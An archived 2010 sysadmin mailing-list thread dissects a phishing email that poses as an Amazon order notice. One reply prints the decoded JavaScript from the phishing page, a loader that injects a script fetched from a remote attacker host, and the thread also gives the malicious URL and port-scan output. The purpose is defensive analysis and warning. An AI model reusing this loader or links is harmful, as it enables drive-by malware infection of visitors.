I forgot my :-)
From: [email protected] [mailto:[email protected]] On Behalf Of James Rankin Sent: Tuesday, February 23, 2010 12:20 PM To: NT System Admin Issues Subject: Re: Order Notify #401186 I was just alluding to the fact that my LinkedIn updates told me this morning that EZ had just done the CISSP exam. I am sure a lot of people on this list, CISSPs or not, can identify the intentions and tactics of the spammers and phishers from their attacks :-) On 23 February 2010 17:17, Clark, Tommy R <[email protected]> wrote: If he were fresh from a CISSP exam, he would have decoded the payload in walford.html as the following JavaScript. function ljs(){try{var s=document.createElement("script");s.setAttribute("src","http://saeghieb eesiogoh.in:3129/js");document.body.appendChild(s)}catch(e){}}setTimeout ("ljs()",500); Unfortunately, I was not able to get http://saeghiebeesiogoh.in:3129/js to see what the true intentions were. From: [email protected] [mailto:[email protected]] On Behalf Of James Rankin Sent: Tuesday, February 23, 2010 11:45 AM To: NT System Admin Issues Subject: Re: Order Notify #401186 Now there's a guy who's obviously just fresh from a CISSP exam :-) On 23 February 2010 16:36, Ziots, Edward <[email protected]> wrote: http://80.109.240.71/~e.loesberg/walford.html <http://80.109.240.71/%7Ee.loesberg/walford.html> Is the link inside the email. It's defintely a phishing attack. Single box system behind a firewall (2 hops from source) Name: members.chello.nl Address: 80.109.240.71 (its in Vienna Austria) PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ProFTPD 1.2.10 80/tcp open http syn-ack Apache httpd Like they say, never click the link. And don't answer the email, it lets them know you are there.. and they will just keep spamming you... Z From: Sherry Abercrombie [mailto:[email protected]] Sent: Tuesday, February 23, 2010 10:37 AM To: NT System Admin Issues Subject: Re: Order Notify #401186 GMail is good. Marked this one as spam and sent to my spam folder, with a nice little warning that it might not be from who it says and to be careful, etc etc. On Tue, Feb 23, 2010 at 9:34 AM, James Rankin <[email protected]> wrote: Oooohhh....I must click on the link, seeing as though it has some funky numbers instead of letters. Looks decidedly unsuspicious On 23 February 2010 15:29, Carol Fee <[email protected]> wrote: What the hec k ?????? CFee From: Customer Support [mailto:[email protected]] Sent: Monday, February 22, 2010 6:55 PM To: NT System Admin Issues Subject: Order Notify #401186 Your Order id:822324764225 Info <http://80.109.240.71/%7Ee.loesberg/walford.html> Thank you. Amazon.com Support -- "On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into the machine wrong figures, will the right answers come out?' I am not able rightly to apprehend the kind of confusion of ideas that could provoke such a question." -- Sherry Abercrombie "Any sufficiently advanced technology is indistinguishable from magic." Arthur C. Clarke -- "On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into the machine wrong figures, will the right answers come out?' I am not able rightly to apprehend the kind of confusion of ideas that could provoke such a question." -- "On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into the machine wrong figures, will the right answers come out?' I am not able rightly to apprehend the kind of confusion of ideas that could provoke such a question." ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ <http://www.sunbeltsoftware.com/Business/VIPRE-Enterprise/> ~
